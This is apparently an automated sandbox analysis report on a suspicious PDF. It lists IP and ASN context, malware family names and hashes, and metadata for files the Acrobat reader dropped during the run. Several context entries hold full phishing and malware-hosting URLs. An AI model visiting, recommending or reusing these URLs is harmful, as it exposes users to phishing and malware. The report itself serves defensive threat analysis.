                      • Excluded domains from analysis (whitelisted): logincdn.msauth.net, e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, lgincdnmsftuswe2.azureedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, clientservices.googleapis.com, acroipm2.adobe.com, clients2.google.com, ocsp.digicert.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, update.googleapis.com, www.gstatic.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, optimizationguide-pa.googleapis.com, clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com.delivery.microsoft.com, aadcdnoriginwus2.azureedge.net, ctldl.windowsupdate.com, aadcdn.msauth.net, p13n.adobe.io, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, armmf.adobe.com, edgedl.me.gvt1.com, aadcdnoriginwus2.afd.azureedge.net, lgincdnmsftuswe2.afd.azur
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtSetInformationFile calls found.
                      • VT rate limit hit for: Updated_Proposal_20241113_pdf_banca.pdf

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      04:28:21API Interceptor2x Sleep call for process: AcroCEF.exe modified

                      LLM Input / Output

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      1.1.1.1PO-230821_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                      • www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
                      AFfv8HpACF.exeGet hashmaliciousUnknownBrowse
                      • 1.1.1.1/
                      INVOICE_90990_PDF.exeGet hashmaliciousFormBookBrowse
                      • www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
                      Go.exeGet hashmaliciousUnknownBrowse
                      • 1.1.1.1/
                      50.87.150.217malek.sadri@wynnlasvegas.com.htmlGet hashmaliciousHTMLPhisherBrowse
                        18.245.31.5https://ampa.fi/uEvMZCXCvXGet hashmaliciousUnknownBrowse
                          https://t.ly/Bv1rGGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                            https://www.hopp.bio/hawksridgefarmsGet hashmaliciousMamba2FABrowse
                              https://thaykinhgiasoc.com/o/?c3Y9bzM2NV8xX25vbSZyYW5kPU9USlBZakE9JnVpZD1VU0VSMTcxMDIwMjRVMDAxMDE3NDA=N0123NGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                EFT Remittance_CQDM.htmlGet hashmaliciousMamba2FABrowse
                                  Leg AdobeShareFile62532.pdf.eml (21.8 KB).msgGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                    Transcript_Sh03 summit bhc.htmlGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                      Transcript_Sh03 summit bhc-2.htmlGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                        #U25b6#Ufe0fVmail__00_15.htmlGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                          https://ad.broadstreetads.com/click/808995/c536057/z64631?destination=https://carolyndc.com/m/?c3Y9bzM2NV8xX25vbSZyYW5kPVJFVXiaMUE9JnVpZD1VU0VSMTQxMDlwMjRVMTQxMDE0NTc=N0123NGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                            13.107.246.45https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4Get hashmaliciousHTMLPhisherBrowse
                                            • nam.dcv.ms/BxPVLH2cz4

                                            Domains

                                            No context

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            MICROSOFT-CORP-MSN-AS-BLOCKUSiwir64.elfGet hashmaliciousMiraiBrowse
                                            • 20.168.212.112
                                            file.exeGet hashmaliciousLummaCBrowse
                                            • 13.107.246.45
                                            View Pdf Doc_a42d45ecadd4b9604949c99fe71e46fe.htmGet hashmaliciousUnknownBrowse
                                            • 40.99.150.98
                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                            • 13.107.246.45
                                            file.exeGet hashmaliciousLummaCBrowse
                                            • 13.107.246.45
                                            2024-HRDCL-0000796.xlsGet hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            DHL Shipment DOCs_002.xlsGet hashmaliciousUnknownBrowse
                                            • 13.107.246.45
                                            file.exeGet hashmaliciousLummaCBrowse
                                            • 13.107.246.45
                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                            • 204.79.197.203
                                            file.exeGet hashmaliciousLummaCBrowse
                                            • 13.107.246.45
                                            CLOUDFLARENETUSdekont_7083037 T#U00dcRK#U0130YE HALK BANKASI A.#U015e..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            file.exeGet hashmaliciousLummaCBrowse
                                            • 104.21.80.55
                                            https://www.patrimoine-commerce.com/Get hashmaliciousUnknownBrowse
                                            • 188.114.96.3
                                            View Pdf Doc_a42d45ecadd4b9604949c99fe71e46fe.htmGet hashmaliciousUnknownBrowse
                                            • 104.17.25.14
                                            http://www.skyunitedlc.comGet hashmaliciousUnknownBrowse
                                            • 104.17.25.14
                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                            • 172.67.174.133
                                            file.exeGet hashmaliciousLummaCBrowse
                                            • 172.67.174.133
                                            Microsoft.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                            • 188.114.97.3
                                            Transaction_copy.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 188.114.96.3
                                            REQUEST FOR OFFER EQUIPMENT ORDER LIST.exeGet hashmaliciousAgentTeslaBrowse
                                            • 172.67.74.152
                                            AMAZON-02USiwir64.elfGet hashmaliciousMiraiBrowse
                                            • 205.251.204.56
                                            DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                            • 13.248.169.48
                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                            • 18.244.18.27
                                            file.exeGet hashmaliciousCStealerBrowse
                                            • 45.112.123.126
                                            qkbfi86.elfGet hashmaliciousMiraiBrowse
                                            • 18.137.130.185
                                            dvwkja7.elfGet hashmaliciousMiraiBrowse
                                            • 18.183.164.66
                                            dlr.sh4.elfGet hashmaliciousUnknownBrowse
                                            • 54.171.230.55
                                            https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exeGet hashmaliciousUnknownBrowse
                                            • 52.222.206.94
                                            Satan.arc.elfGet hashmaliciousMiraiBrowse
                                            • 54.171.230.55
                                            botnet.arm5.elfGet hashmaliciousUnknownBrowse
                                            • 54.171.230.55
                                            UNIFIEDLAYER-AS-1US01. MT JS JIANGYIN Ship Particulars.xlsx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 50.87.144.157
                                            ESTEEM ASTRO PARTICULARS.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 50.87.144.157
                                            Demande de proposition du Complexes Sportifs Terrebonne.pdfGet hashmaliciousUnknownBrowse
                                            • 192.185.163.164
                                            https://u47618913.ct.sendgrid.net/ls/click?upn=u001.ySazWJ5NZMDRHbOtEU-2BeoVq5CHimfeKOmAStZ-2FBgQMYQ3SSwsETAhk1yN-2BT4-2Bp2oKYzZov6D-2F-2FVWJZ1NqqUA8rkCQTGD9qAyzE3VfFeoQ2nuSJqqyEFkZOdD2fHyfAGMqPTrK5an3w0r3jeoJ-2B5P7rAm7lpee2LRBP-2FVZ8vpCC6OhMnZUP9C90hQTb0-2BpgFS16pphNEcXB1XFdv8oIx-2FwRORRrbhR98R4uG9rtcNDDwGDlWsc4rC8kZPQKm-2F1Mm8tNwYXTNsqE7C9scBPWKFj8-2Flkc4ljwpAg27SdTSH4Lv1yIeDUc-2Br14vSnR5hortDhaaXBKI0vawIBQmkU8qdJOSHyv8egzfUQvo0FmhKgqV1moo-2BnRe99IbJ35dDYZE0MrccJKFnB5BMI9ztOOsnQMWDWj4usmLc-2BeVbqm24LsVBI18WzbkH2NLJelVG2ts-2FY8NEmgO2IHd2ydt-2BhAOvQWuc-2BoCn3Ao-2FeTWrPbny4XNYysHB9Qu5AO8kwT-2BngJOg10GMOXJS1JsoXicgqZmKM-2B-2FBOfXRHNWtl98FVLgmqGL1yDRbHi-2BrUHFtCwtB3BRDatptZmQIPNmSCXkxadq8IAoDDcDLc8BntBCtxPjmUSXgMaBFfsbPygwonXOkWZIQIxp1wvHXj-2BZ1eIGRPTwfugS5VMB7jYi-2FePeZ2P8ejmUXu0aUYor7jxsavDdhhTlU0d3WGd7xXyc70gSNl4s0N8kb-2FhMFZ3OuPfAMZG-2BGWl7Vsgw97GpKKLJX78rYX8Dtq0-2BFHI8oijeDXiQEnvU-2FI4F3F63PGiFfTUlwdYZGBzmjvsDN3AL1dSwty6HpxvSAKCtZ9VWrfa8NwcaFPKhxnxW4r2AR9TTWpNatEfU14LjPxEM-2F6jXkw8omQsSQ5ERlG1h6ZTouS0rz5yiYIeyCUVpUuOT4FtnK35YgC-2B0S-2FAum0FNVEv9aFTVDigH5szZA6pWOYsjwY5forGtNE55v7VxXGbkIRiEOYPWjYX7vj5EKbcmwdWMu8O3989atXdomEpBZG0cX1ylWoweLRVGVMNbSs-2FOqs-2B2xH8pdGj9VcybpSShtsD0ZIyshNyN0TwKGcJvKUNgMPDQVU64V5WleuedIajiM6uCp0xLc8RFYl0z-2B6RGF9NRTuzleNM-2Fg7hwq-2BEg52eVJjsFh3FdZjf0sr4TFySEDrqq3wci8zEr-2FI5c5Wj-2Fk-2F98bI-2FtCrFbLhfO78CKXQ3KYT53otrRT47GTmw-3D-3DwgKy_cipWnXOVDIhOM-2BBXOyzcHeOgQULBtPxx5riDWemF2G-2BwYzp7goEAXusjqSQprai9ZAQSor3gqS04DnqVBNX-2B27UevOScScKFnEaHJjzQ16GEAAakNELZybevGcJfbhSMyz-2FBkUhDktUr20hzj2tsCmKBBmBXnfL9SKUCvI82Axz3RMcAfJhD5XZvwDkb1SgvyUaaM4lOGnGhDtzRF5NN8-2FlqjhJjS-2FU6ncYoAfO4VYI-3DGet hashmaliciousHTMLPhisherBrowse
                                            • 192.185.154.245
                                            Play_VM-Now(Bfassl)CLQD.htmlGet hashmaliciousUnknownBrowse
                                            • 192.185.13.173
                                            Demande de proposition du Groupe Esp#U00e9rance et Cancer[45838].pdfGet hashmaliciousUnknownBrowse
                                            • 192.185.163.164
                                            https://l.e.expansion.com/rts/go2.aspx?h=1472587&tp=i-1NGB-A5-b00-1YXgaC-6v-X6KL-1c-1D5I0b-lAXcqWepVc-1yosex&pi=X3ChywZXQmNE8VeceGHlfotAef21gDzbhSQg1vZMQMU&x=%64%79%6E%61%6D%69%63%69%74%64%65%76%69%63%65%73%2E%63%6F%6D%2F%6A%6F%69%6B%64%6A%6D%65%75%65%2FFUDMSvpcJrwI1XV/YW5kcmV3Lm1hbnRlY29uQGZpcnN0b250YXJpby5jb20=Get hashmaliciousHTMLPhisherBrowse
                                            • 192.185.115.105
                                            Ranger Steel Erectors Inc RFQ.eml (8.12 KB).msgGet hashmaliciousHTMLPhisherBrowse
                                            • 108.167.188.184
                                            http://googleads.g.doubleclick.net/aclk?sa=L&ai=CJF0hsbsNVNi_DIPR0AGqhIGYDPfOz9MFj-TFvsMB25uy0esBEAEg4_uTA1DMiaOOBWDN8N-A5ALIAQSpAgbEodTv6J0-qAMBmAQFqgSnAU_QL6NE73jlCJ7TFvA2kg2Ig3wrASDHwt7I6P2gJSz2wmCekvewEDUw1zPqYx0NADEmzairfw3ur1wkNI8P6teiwhlldXdj5OGBN4lmsCEDPv86I5o3eNVngnJfRiuDvxlWje20-VfTVoLEZHjLsyN8zQleVTsGbhHjd1BSHfxBMk8P6-QwvlL67TaFDfOyk-sIZEC0a7hK4DdrheQBo-5kNsgA7ijRoAYEgAfP_b4i&num=1&sig=AOD64_1QMErG-pSUGweRO5zdk0lMn9Ngwg&client=ca-pub-6219811747049371&adurl=http://nDmfN.toplogtrans.com.br%2Fcgi-bin%2F9224511553/9224511553/cGFydG5lcmhuZHVhbWVyQHB1cmVzdG9yYWdlLmNvbQ==Get hashmaliciousUnknownBrowse
                                            • 50.116.86.68
                                            EXT_Transaction Details for Martibs -462fd4a1151861ecbc00b016e69e7825 (18.7 KB).msgGet hashmaliciousUnknownBrowse
                                            • 69.49.245.172

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):292
                                            Entropy (8bit):5.172960934645066
                                            Encrypted:false
                                            SSDEEP:6:HUvq2Pwkn2nKuAl9OmbnIFUt8YUGCZmw+YUGukwOwkn2nKuAl9OmbjLJ:WvYfHAahFUt8F/+X5JfHAaSJ
                                            MD5:76F7DC7AFA24BF5FB28A8C662A9DA1FA
                                            SHA1:1CF8817AA8A4827A5CB0B30C871AD613DA8E0FD8
                                            SHA-256:6B203D5903055F654A3E5A1AE94B39FA0BF30DA1125B9AD7D14A825586871276
                                            SHA-512:46C193753773914DF1C502F853606EEED846571FC817796E7DD6E32FEA33703F8B139C71456592E7CCC6F766ECC7B22D66DF09188356884947A1DF0E4BC462B7
                                            Malicious:false
                                            Reputation:low
                                            Preview:2024/11/14-04:28:08.217 1d74 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/14-04:28:08.218 1d74 Recovering log #3.2024/11/14-04:28:08.218 1d74 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):292
                                            Entropy (8bit):5.172960934645066
                                            Encrypted:false
                                            SSDEEP:6:HUvq2Pwkn2nKuAl9OmbnIFUt8YUGCZmw+YUGukwOwkn2nKuAl9OmbjLJ:WvYfHAahFUt8F/+X5JfHAaSJ
                                            MD5:76F7DC7AFA24BF5FB28A8C662A9DA1FA
                                            SHA1:1CF8817AA8A4827A5CB0B30C871AD613DA8E0FD8
                                            SHA-256:6B203D5903055F654A3E5A1AE94B39FA0BF30DA1125B9AD7D14A825586871276
                                            SHA-512:46C193753773914DF1C502F853606EEED846571FC817796E7DD6E32FEA33703F8B139C71456592E7CCC6F766ECC7B22D66DF09188356884947A1DF0E4BC462B7
                                            Malicious:false
                                            Reputation:low
                                            Preview:2024/11/14-04:28:08.217 1d74 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/11/14-04:28:08.218 1d74 Recovering log #3.2024/11/14-04:28:08.218 1d74 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):336
                                            Entropy (8bit):5.167487038996315
                                            Encrypted:false
                                            SSDEEP:6:HUnuAZL+q2Pwkn2nKuAl9Ombzo2jMGIFUt8YUdKWZmw+YULLVkwOwkn2nKuAl9OU:JAZL+vYfHAa8uFUt8uW/+NLV5JfHAa8z
                                            MD5:C3B079E334A7002FB769237433F5653C
                                            SHA1:4B38F775E67B6FBCCC668DEB2285F6FBE82C542C
                                            SHA-256:3C59A849B06CB62D46114A1111D85AE937699A8D24BB5ADBB5AA01A7DA71C8D7
                                            SHA-512:F28C72C81B5A0650A037BEA405450122E4E4234C0353450D9FCBDBDF7DE893536FBC72EEA71525E231C6ADC323A5D315600FB6E8C3A82EA97A63E5BB27C76D0F
                                            Malicious:false
                                            Reputation:low
                                            Preview:2024/11/14-04:28:08.269 1e3c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/14-04:28:08.270 1e3c Recovering log #3.2024/11/14-04:28:08.270 1e3c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):336
                                            Entropy (8bit):5.167487038996315
                                            Encrypted:false
                                            SSDEEP:6:HUnuAZL+q2Pwkn2nKuAl9Ombzo2jMGIFUt8YUdKWZmw+YULLVkwOwkn2nKuAl9OU:JAZL+vYfHAa8uFUt8uW/+NLV5JfHAa8z
                                            MD5:C3B079E334A7002FB769237433F5653C
                                            SHA1:4B38F775E67B6FBCCC668DEB2285F6FBE82C542C
                                            SHA-256:3C59A849B06CB62D46114A1111D85AE937699A8D24BB5ADBB5AA01A7DA71C8D7
                                            SHA-512:F28C72C81B5A0650A037BEA405450122E4E4234C0353450D9FCBDBDF7DE893536FBC72EEA71525E231C6ADC323A5D315600FB6E8C3A82EA97A63E5BB27C76D0F
                                            Malicious:false
                                            Reputation:low
                                            Preview:2024/11/14-04:28:08.269 1e3c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/11/14-04:28:08.270 1e3c Recovering log #3.2024/11/14-04:28:08.270 1e3c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\47415fd4-9a8f-4900-b776-5aeb75b97ede.tmp

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:JSON data
                                            Category:modified
                                            Size (bytes):475
                                            Entropy (8bit):4.957950752632059
                                            Encrypted:false
                                            SSDEEP:12:YH/um3RA8sqosBdOg2H5Icaq3QYiubInP7E4T3y:Y2sRdsEdMH5j3QYhbG7nby
                                            MD5:1A7179D3AAED8989487777CA1A623EA6
                                            SHA1:9CDE04F1571549FD88AB070834896D44A1ABFA92
                                            SHA-256:191B9DFD50658A59A01845B04E0F6381ACFB612B075A36840BFE211FF29F45A9
                                            SHA-512:E0D498830AAEC90495758A8B1BFF6C02333A0336F095E8DB83C0C70066A7241FEFF6A3DFBFEB41D7078AA3311BE3411B315E1CCE2D9AC28E2A3C82AFA334793C
                                            Malicious:false
                                            Reputation:low
                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13376136494192465","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":242172},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):475
                                            Entropy (8bit):4.957950752632059
                                            Encrypted:false
                                            SSDEEP:12:YH/um3RA8sqosBdOg2H5Icaq3QYiubInP7E4T3y:Y2sRdsEdMH5j3QYhbG7nby
                                            MD5:1A7179D3AAED8989487777CA1A623EA6
                                            SHA1:9CDE04F1571549FD88AB070834896D44A1ABFA92
                                            SHA-256:191B9DFD50658A59A01845B04E0F6381ACFB612B075A36840BFE211FF29F45A9
                                            SHA-512:E0D498830AAEC90495758A8B1BFF6C02333A0336F095E8DB83C0C70066A7241FEFF6A3DFBFEB41D7078AA3311BE3411B315E1CCE2D9AC28E2A3C82AFA334793C
                                            Malicious:false
                                            Reputation:low
                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13376136494192465","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":242172},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):4730
                                            Entropy (8bit):5.249408178725766
                                            Encrypted:false
                                            SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo74LDxrrDZ:etJCV4FiN/jTN/2r8Mta02fEhgO73gow
                                            MD5:74A254FB975F4AE7E7B01E1EABB987A4
                                            SHA1:1B698A2159ECED9820BA9069C14A6847838CA7EC
                                            SHA-256:6792F01CD7BC082AE538BC05EB7CC5CC421E3EA938C5E2D84101A08BE7661078
                                            SHA-512:828CD9369B5A8D50C8D4E3E278AC3C9F6B1CF9B47D81F36402A783C2C502B123BE38B94AC115608C6E8FE0151AA475F0651B1405F7841C00880D84D4EA832EED
                                            Malicious:false
                                            Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_

                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):324
                                            Entropy (8bit):5.181287918949978
                                            Encrypted:false
                                            SSDEEP:6:HUb+L+q2Pwkn2nKuAl9OmbzNMxIFUt8YUzSFoG1KWZmw+YUzT3LVkwOwkn2nKuAo:A+L+vYfHAa8jFUt8l2oXW/+lT3LV5Jfv
                                            MD5:76A7543EB136071440104690CFB71E4E
                                            SHA1:8ED646D87E7F36196F207D2D0D0E0EC5D608DC53
                                            SHA-256:7A34E4BF22511CA9F5EDD45E9B1AC61D0AD5B7DD3943E0D5C1BC55774AD6D312
                                            SHA-512:906838F4600B87F3547106FB3A6813B9A0CF2F23BB931A14B2EA48BA5F88C805B40C3CEB278A7D2C04B2734E410CA1B9566007EFA18B56F25C36FC90183F0C2A
                                            Malicious:false
                                            Preview:2024/11/14-04:28:08.493 1e3c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/14-04:28:08.530 1e3c Recovering log #3.2024/11/14-04:28:08.568 1e3c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                            C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:ASCII text
                                            Category:dropped
                                            Size (bytes):324
                                            Entropy (8bit):5.181287918949978
                                            Encrypted:false
                                            SSDEEP:6:HUb+L+q2Pwkn2nKuAl9OmbzNMxIFUt8YUzSFoG1KWZmw+YUzT3LVkwOwkn2nKuAo:A+L+vYfHAa8jFUt8l2oXW/+lT3LV5Jfv
                                            MD5:76A7543EB136071440104690CFB71E4E
                                            SHA1:8ED646D87E7F36196F207D2D0D0E0EC5D608DC53
                                            SHA-256:7A34E4BF22511CA9F5EDD45E9B1AC61D0AD5B7DD3943E0D5C1BC55774AD6D312
                                            SHA-512:906838F4600B87F3547106FB3A6813B9A0CF2F23BB931A14B2EA48BA5F88C805B40C3CEB278A7D2C04B2734E410CA1B9566007EFA18B56F25C36FC90183F0C2A
                                            Malicious:false
                                            Preview:2024/11/14-04:28:08.493 1e3c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/11/14-04:28:08.530 1e3c Recovering log #3.2024/11/14-04:28:08.568 1e3c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                            C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241114092812Z-158.bmp

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                            Category:dropped
                                            Size (bytes):65110
                                            Entropy (8bit):0.6325819276006657
                                            Encrypted:false
                                            SSDEEP:1536:A4DkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkXkkakkkkkW:AOkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk
                                            MD5:45D530C35E61BA60E05D6A82392CF588
                                            SHA1:D39019B0C4AB18AF2E8FA8555DF19A6AFAA7D658
                                            SHA-256:234B54AFCDD8F4174E57914FC6EFCF63C97D1EC9CE88F006B8436B702A1A95B9
                                            SHA-512:C39F31B2727DA223CF2BF93D57235A6B7E47DA683DD6E3A83408ACDB5C25378B513A49AD24C52EEE0011A6D21B2256F3C8AC6E6251A971B7AB33ECBD480E2950
                                            Malicious:false
                                            Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 17, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 17
                                            Category:dropped
                                            Size (bytes):86016
                                            Entropy (8bit):4.445194332794845
                                            Encrypted:false
                                            SSDEEP:384:Secci5t4iBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:Mfs3OazzU89UTTgUL
                                            MD5:A16F56F4627366CCEF6805291315ED15
                                            SHA1:77F20B0E56A8D290D1DB1F4B064D7F2D68EC1DA7
                                            SHA-256:F515865A87611046C4D9E3FA8A8F32BBD1B2E7BDE33D01AEB2596818FB2E2D8B
                                            SHA-512:1C4513859CA4755CD114D0F20FAA6853C2E0BDB88B830788040F5B0AD16F2EE9C890ACAA752E4AF88BD16854D0EC428581A57D5224FC52C66E828FCD0840B949
                                            Malicious:false
                                            Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:SQLite Rollback Journal
                                            Category:dropped
                                            Size (bytes):8720
                                            Entropy (8bit):2.2150064984862783
                                            Encrypted:false
                                            SSDEEP:48:7M4jenC7vqvmFTIF3XmHjBoGGR+jMz+Lhy:77jenS79IVXEBodRBkM
                                            MD5:B02B2B7D1DC0396E11F361118094C237
